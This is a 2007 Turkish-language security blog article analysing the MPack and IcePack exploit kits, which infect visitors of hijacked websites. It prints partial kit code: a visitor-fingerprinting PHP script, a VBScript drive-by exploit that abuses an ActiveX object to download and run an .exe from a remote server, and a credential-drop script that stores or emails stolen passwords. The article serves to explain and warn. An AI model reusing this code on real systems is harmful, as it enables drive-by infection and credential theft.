INTERNET'İN SAKLI YÜZÜ

October 9, 2007 yazan Tacettin Karadeniz

INTERNET'İN SAKLI YÜZÜ

      Amaç; dosya türüne(.exe, .com, .bat) göre sistemde yer edinmekti. Tehlike, öncelikle dosyalara saklanırdı. Virüslerin görevi; kendini saklayabileyeceğin dosyayı bul, zamanı gelince kendisinden istenen görevi yerine getirmek idi. İlk zamanlar Virüs olayları bundan ibaretti. Gün geçtikçe yazılım zaaflarından faydalanarak ortalıkta dolaşmaya başlayan solucanlar ortaya çıktı. İnternet kavramının toplum içinde kullanımı artmasıyla yeni tür zararlı uygulamalar kullanıcıları hedef almaya başladı. Buna paralel olarak sistemlerini korumak maksadıyla çeşitli güvenlik uygulamaların kullanım yüzdesi arttı. Bilgisayar kullanıcıların lügatlarına Antivirüs, Firewall gibi kelimeler yer edinmeye başladı. Bilgisayarı ister evde kullanın ister iş yerinde, eğer İnternet ile iç içe iseniz sisteminize günün birinde zararlı bir program(cık)ın misafir olması sizi şaşırtmasın.  Özel hayat bilgisayarla iç içe oldukça, birileride bilgisayarla birlikte olan bu özel hayata gözünü kestirmişti. Masumca duran küçük bilgilerden elde edilecek özel kayıtlara kadar tüm bilgiler bir çift gözün önünde olabilir.

    Günümüzde; bilgisayar kullanıcılarına yönelik yapılan saldırıların çoğu yazılım zaaflarının kullanılmasıyla meydana gelmekte.
Genellikle Browser(İnternet Explorer, Opera, Firefox) zayıflıklarından kaynaklanan saldıranların sonucunda kullanıcıların sistemine tehlikeli programlar yerleşmektedir. Bunun neticesinde, sisteme yerleşen bu tür programcıkların yarattığı etkiler çeşitlidir. Bu tür saldırıların etkisini kullanıcılar genellikle fark(!) edemez. Sisteme yerleşen tehlikeli bu programcıklar kullanıcıyı bazen BotNet(1) ağının bir parçası yapar, bazen de kullanıcıların şifrelerini ele geçirmek için kendine yer edinir.

   

    Hedef; internet kullanıcıları olmasına rağmen aynı anda birden fazla kullanıcının sistemine erişim sağlanmak için araya web sunucularıda girmektedir. Saldırgan kullanıcıların en cok ziyaret ettiği  web sunucularına yerleştirdiği kodlar vasıtasıyla kullanıcıların bilgisayarlarına erişim sağlamaktadır. Bu kodlar genellikle güncel yazılım açıklarıdır. Böylece bir kullanıcı web sitesine bağlandığında eğer o web sitesi tehlikeli bir kod içeriyorsa kullanıcının sistemine zararlı bir kod enjekte eder. Gerçekleşen bu işlemleri kullanıcı fark etmez.

Resim1 : Gizli Kod

Resim 1’de görüldüğü üzere ana sayfaya(index.html v.b.) yerleştirilen kod, kullanıcının bilgisayarına zararlı dosyayı aktarır. Resim 1 de belirtilen kodun ne işe yaradığı ve ne şekilde aktarıldığını Resim 2 de görüyoruz.

 

Resim 2 : Gizlenen kodun açık hali

Bu tür kodların Antivirüs uygulamaları tarafından yakalanmasını zorlaştırmak için bazı algoritmalar geliştirilir. Böylece, Antivirüs algılamazsa kullanıcı zaten hiçbir şekilde algılamaz mantığı güdülür. Bu mantığın işe yaramadığı bazen görülür(Resim 3).

 

Resim 3 : Zararlı parçaçık Antivirüs uygulaması tarafından tespit edilişi.

Yazılımlarda bulunan güvenlik açıklarından faydalanmak için gün geçtikçe yeni taktikler geliştirilmektedir. Özellikle son zamanlarda geliştirilen bu taktiklerin başında, birden fazla güvenlik açıklarını tek bir çatı altında toplamak. Oluşturulan bu kitlerin başında MPACK, WEBMONEY, [XDS] TDS, ZUNKER, ICEPACK gelir. Bu kitler birden fazla uygulamalara ait güvenlik açıklarını bünyesinde barındırarak web sunucularına kurulur. Saldırgan bu kitlerle web sunucuda gerekli ayarları yaparak , bu sunucudaki web sayfalara bağlanan kullanıcıların sistemine zararlı uygulamaları otomatik olarak yükler.

İzinsiz giriş yapılan bir çok web sunucusunda bu kitlerin kurulduğu görülür. Bu kitler(exploit kit de denir) genellikle belirli bir ücret karşılığında satışa sunulur(fiyatları 1000$, 700$, 500$ ve hatta 20$ arasında değişir). Fiyatlarını barındırdığı exploit türlerine ve sayısına göre belirler.
Bir çok web sitenin sayfalarında bu kitlerin izi rastlanmaktadır. 

 

 

Kontrol süreci

Bu kitlerde genellikle browser türlerine göre zaaf kontrolü bulunur. Kullanıcıların kullandıkları Web browser ( Internet Explorer,Opera,Firefox) türüne göre atak çeşitleri belirlenir ve o zaafa göre dosya kullanıcının sistemine sızar.

İçerdikleri exploit türlerinden bazıları:

- ANI Overflow
- MS06-014
- MS06-006
- MS06-044
- WebViewFolderIcon Overflow
- WinZip ActiveX Overflow
- QuickTime Overflow
- MS06-071
- MS06-057
- MS07-017

 

Bilgisayar kullanıcısı sayfalar arasında gezerken ekrana istediği bilgiler yansır fakat farkında olmadan başka bir sayfaya yönlendirildiğinde(Resim 4) sisteminde zaaf taraması başlar.

Resim 4  : "iframe src" kısmına dikkat.

Resim 5 Uzaktan iz sürme mekanizması. Bir nevi sisteme sızma analizleri.

Saldırgan exploit kitler sayesinde ülke bazında hangi sistemlere ne tür bir zaaf barındırdığına dair istatistiksel bilgilere de sahip olabilir(Resim 5).

Bu istatistiksel bilgiler arasında hangi web adreslerinde yönlendirme koduna sahip olduğuda görüntülenebilir[<iframe=…] (Resim 6)

 

Resim 6 : Gizli yönlendirme kodlarının bulunduğu site indexi.

 

Mpack exploit kitinin birden çok versiyonu vardır. Versiyonları exploit türlerine göre değişir. En son version olarak Mpack 0.94 ve hatta Mpack 0.95 versiyonun olduğu söylenmektedir. Fakat bu versiyonlarının bir backdoora(arkakapı) sahip olduğu belirtilmektedir. Mpack exploit kitinde mevcut kodlar Resim 7 de gösterilmektedir.

 

Resim 7 : Bir exploit kiti oluşturan parçalar(Mpack içeriği).

 

Resim 8 : Web sunucusu üzerinden kontrol etmek için önce giriş yapılır. Giriş kontrolü ve veritabanına(mysql) ilişkin bilgiler.

Mpack, istatistiksel bilgilere ulaşım için bir admin paneli bulunmaktadır. Kişisel ayarlar vasıtasıyla sifreli erişim olanağı sağlamakta.
Buradan anlaşılmaktadır ki; bu web sunucu ya özel olarak saldırgan tarafından ayarlanmıştır yada zorla erişim sağlanarak sunucunun kontrolü ele geçirilmiştir(Resim 8 – 9)

 

Resim 9 : Mpack admin paneli

 

Mpack, gerekli verileri(tüm IP girdileri) mysql veritabanına aktarır. Web arayüzü ile bu kayıtlar incelenebilir.

Örnek mysql incelemelerini Resim 10 ve 11 de bulabilirsiniz.

 

Resim 10 : Mpack veritabanına dikkat.

 

Resim 11 : Mpack mysql incelemesi

 

Mpack exploit kiti internette dolaşırken bir başka exploit kit olan IcePack de kendini göstermeye başladı(Resim 12).

Resim 12 : Serinleten bir Exploit paketi : IcePack

IcePackin admin panelinin özelliği Mpack’e göre daha kapsamlı(Resim 13).

Resim 13 : Yönlendirme kodu gizleme kısmı

Saldırgan, Icepack admin paneli vasıtasıyla istediği şekilde yönlendirme kodu oluşturabilir. Böylece kullanıcının ziyaret ettiği sayfalara bu kod parçasını ekleyerek kendi istatiski bilgilerine bir kullanıcıyı daha eklemeyi başarır(Resim 13).

Bu tür exploit kitlere zamanla yenileride eklenmekte. Yeni özellikler, yeni güvenlik açıkları ve Antivirüsler tarafından algılanmamasını sağlanan yeni zararlı dosyalar eklenmektedir. Bu kitlerin tamamını kullanıcı bilgilerini mysql veritabanına kaydettiğini belirtmiştim. Buradan şu anlaşılıyor ki; bu kitlerin kurulduğu sistemler birer konakçı olarak kullanılmaktadır.

 

Resim 14 : Bir başka exploit kit veritabanı kaydı. “Xoce” kaydına dikkat

Resim 15 : Resim 14 de belirtilen xoce kaydında yer alan tablolar.

Resim 16 : “tp_users” tablosunun içerik yönergesi. Bilgi takibini yapabilen yetkili kullanıcılarının bilgilerinin saklanacağı tablodur.

Exploit kit içinde yer alan örnek bir parça(index.php)

$r = mysql_query($sql); $num = mysql_num_rows($r); if ( $num > 0 ) {

            $sql = 'UPDATE tp_hits set total = total +1';

            mysql_query($sql);

            echo "<center>Sorry! You IP is blocked.</center>";

            exit();

            }

 

$user_agent = getenv("HTTP_USER_AGENT");

$uri = getenv("REQUEST_URI");

$accept_lang = getenv("HTTP_ACCEPT_LANGUAGE");

$ref = substr(mysql_real_escape_string(getenv("HTTP_REFERER")),0,40);

 

if (strstr($user_agent, "Nav")) $browser = "Netscape";

elseif (strstr($user_agent, "Lynx")) $browser = "Lynx";

elseif (strstr($user_agent, "Opera")) $browser = "Opera";

elseif (strstr($user_agent, "WebTV")) $browser = "WebTV";

elseif (strstr($user_agent, "Konqueror")) $browser = "Konqueror";

elseif (strstr($user_agent, "Bot")) $browser = "Bot";

elseif (strstr($user_agent, "Firefox")) $browser = "Firefox";

elseif (strstr($user_agent, "MSIE")) $browser = "MSIE";

else $browser = "other";

 

if (strstr($user_agent, "Windows 95")) $os = "Windows 95";

elseif (strstr($user_agent, "Windows NT 4")) $os = "Windows NT 4";

elseif (strstr($user_agent, "Win 9x 4.9")) $os = "Windows ME";

elseif (strstr($user_agent, "Windows 98")) $os = "Windows 98";

elseif (strstr($user_agent, "Windows NT 5.0")) $os = "Windows 2000";

elseif (strstr($user_agent, "SV1")) $os = "Windows XP SP2";

elseif (strstr($user_agent, "Windows NT 5.1")) $os = "Windows XP";

elseif (strstr($user_agent, "Windows NT 5.2")) $os = "Windows 2003";

else $os = "other";

 

$sql = sql_placeholder('INSERT INTO tp_stats(datetime, ip, user_agent, browser, os, uri, accept_lang, referrer)

VALUES(?, ?, ?, ?, ?, ?, ?, ?)', date("Y-m-d H:i:s"), $ip, $user_agent, $browser, $os, $uri, $accept_lang, $ref);

mysql_query($sql); ?>

 

<HTML xmlns:IE>

<body>

 

<SCRIPT language="VBScript">

  

Module_Path="http://web_sunucu/get.php?file=exe"

 

   If navigator.appName="Microsoft Internet Explorer" Then

           

      If InStr(navigator.platform,"Win32") <> 0  Then

     

      Const ssfFONTS=20

      Const adModeReadWrite=3

      Const adTypeBinary=1

      Const adSaveCreateOverWrite=2

      

      Dim  oRDS

      Dim  oXMLHTTP

      Dim  oFSO

      Dim  oStream

      Dim  oWShell

      Dim  oShellApp

     

      Dim  WinDir

      Dim  ExeName

      Dim  XMLBody

      Dim  PluginFile

      Dim  cByte

      Dim   ObjName

      Dim   ObjProg

     

      Randomize

 

      ExeName=GenerateName()

      ExeName=ExeName & ".exe"

 

      cls1="clsid:BD96"

      cls2="C556-65A"

      cls3="3-11D0-9"

      cls4="83A-00C04FC29E36"

      clsfull=cls1&cls2&cls3&cls4

 

      Set  oRDS=document.createElement("object")

      oRDS.setAttribute "id","oRDS"

      oRDS.setAttribute "classid",clsfull

     

      Set oShellApp = oRDS.CreateObject("Shell.Application","")

      Set oFolder = oShellApp.NameSpace(ssfFONTS)

...

 

 

Yukarıda verilen kod örneğinde If navigator.appName="Microsoft Internet Explorer" satırı karşılaşacak durumu neredeyse açıklar.
Internet Explorer kullanıyorsan ve durum elverişli ise sisteme .exe dosyası sızar.
Bu exploit kitlerin kurulu olduğu sunuculara bu tip zararlı uygulamalar nasıl yükleniyor?
Bu türdeki exploit kitlerin yüklendiği sistemler incelendiğinde çoğunun izinsiz bir girişle kontrol altına alınarak yüklendiği görülür.
Sunucu yönetiminin bu izinsiz girişlerden haberi olmadan exploit paketleri sisteme yüklenir. Ziyaretci sayısı yüksek olan bir çok sitelerin bulunduğu sunuculara kurulan exploit kitleri sayesinde saldırganlar bir çok kullanıcıyı sıkıntı yarattı.

 

Resim 17 : Web siteye yerleştirilen kod başka web sayfasına yönlendiriyor(injection.js).

 

Kullanıcıya gelen bir e-posta dikkat çekiciyse, kullanıcı ister isteme gördüğü e-postayı incelemek isteyecektir. Bazen gelen e-postanın içeriği konusunda şüpheye düşsede kendine hakim olamayıp e-postanın tutsağı olur. Posta içeriğinde yer alan dosyayı aktif hale getirdiğinde o dakikadan sonra bilgisayarındaki tüm girdiler birilerinin eline geçer.

Aktif hale getirilen tehlikeli dosya bilgisayarın teknik özelliklerinin yanı sıra gizli bilgileride saldırgana bildirecektir. Bunun için bu özel bilgiler bir özel sunucuda toplanır(Resim 18).

 

Resim 18 : Kullanıcıya gönderilen dosya, kişisel bilgileri belirlenmiş bir formatta web sunucuda saklanır.

 

Resim 19 : Kullanıcın bilgisayarına yerleşen zararlı program, kişisel bilgileri tarihe/ip adreslerine göre saldırgana yollar.

 

Yukarıdaki resimde böyle bir programın analizi sonucu elde edilen bulgulardan yola çıkılarak zararlı programın yolladığı dosyalar görülmektedir.
Her bir dosyanın içerisinde kullanıcıların özel bilgileri barınmaktadır.

 

Saklanan bu bilgiler gözlerden uzak durması için belirli bir kritere göre saklanır. İçerik saklıdır. Bunun için bu işlemin bir devamı olan özel bir programla kullanıcının ele geçirilen bilgiler anlaşılır şekilde göz önüne serilir(Resim 20 / 21 / 22).

 

Resim 20 : Gönderilen bilgiler belirli kritere göre irdelenir.

 

 

Resim 21 : Ele geçirilen bilgiler kategorize ediliyor.

Resim 22 : Şifreler(Msn Messenger / Outlook …) kolaylıkla saldırgan tarafından ele geçirilmiş.

Zararlı program(file.exe) web sunucusuyla irtibata geçerek, bilgiler bir betik(pass.php) vasıtasıyla sunucuda saklanmaktadır.

 

pass.php

<?

            $mode = 2;          //1.Send to e-mail, 2.Save to file, 3.E-mail+file

            $rndatch = FALSE;   //Random reports names

            $savetodir = FALSE; //Save reports to changed directory     

            $dirname = "";      //Directory name

.. 

            $ip=getenv("REMOTE_ADDR");

 ..

            IF($mode == 1 || $mode == 3)

            {

                        IF($rndatch)

                        {

                                   $array=range('a', 'z');

.. 

                        $headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";

                        $headers.= "Content-Transfer-Encoding: base64\n";

                        $headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";

                        mail($email, $subject, $msg, $headers);

.. 

                        $filename = date('H_i-d.m.Y', time()+3600*6)."_".$ip."_".$var;

 

                        $fp=fopen($filename, 'w');

                        fwrite($fp, base64_decode($msg));

                        fclose($fp);

Resim 23 :  Elde edilen bilgiler betik(.php) vasıtasıyla saldırganın e-posta adresine gönderiliyor. Resim 22’deki uygulama ile bilgiler anlaşılır hale getiriliyor.

Son günlerde ortaya çıkan güvenlik zaaflarından faydalanarak kullanıcıların sistemine sızan bir tehlikeli uygulama beraberinde ciddi sorunlar getirdiği görülmektedir. Belirttiğim gibi web sayfaları üzerinden kullanıcının sitemine sızan bir Truva atının başka bir sistem üzerinden kontrol edildiğini(web) gördük. Görülen sonuç şudur ki kullanıcılar özellikle bağlandığı internet sayfalarına dikkat etmesi gerekir.

 

Referanslar

1. BotNet(Bot Network)

http://www.olympos.org/belgeler/botnet/botnet-bot-network-126231.html 

2. Gizli Tehlike

http://www.olympos.org/belgeler/gizli-tehlike-126162.html 

3. MPack uncovered

http://pandalabs.pandasecurity.com/archive/MPack-uncovered_2100_.aspx

4. MPack, Packed Full of Badness

http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.html

5. Ice(Pack) for the summer

http://pandalabs.pandasecurity.com/archive/Ice_2800_Pack_2900_-for-the-summer.aspx

 

Permalink